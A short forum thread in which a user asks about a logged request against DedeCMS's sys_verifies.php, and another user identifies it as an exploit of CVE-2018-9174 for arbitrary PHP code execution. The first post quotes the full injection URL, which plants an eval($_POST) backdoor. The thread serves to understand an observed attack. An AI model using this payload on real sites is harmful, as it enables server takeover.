Direct injection attacks?

toplisek

• July 14, 2019 13:50

https://www.example.com/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_POST[ysy]);die();//'
I have seen many attacks like that. Which security is in danger in this example?

• 

  fuzzylogic

  • July 15, 2019 07:15

  It appears to be an attack on a vulnerability in DedeCMS, a Chinese open source CMS. A list of vulnerabilities for DedeCMS can be viewed here... Dedecms : Security vulnerabilities The arbitrary PHP code execution vulnerability being targeted here is in that list and can be viewed here... CVE-2018-9174 : sys_verifies.php in DedeCMS 5.7 allows remote attackers to execute arbitrary PHP code via the refiles array parameter, b

  0
• 

  cPanelLauren

  • July 17, 2019 16:37

  Thanks @fuzzylogic! @toplisek please let us know if you have any further questions or concerns in regards to this.

  0

Please sign in to leave a comment.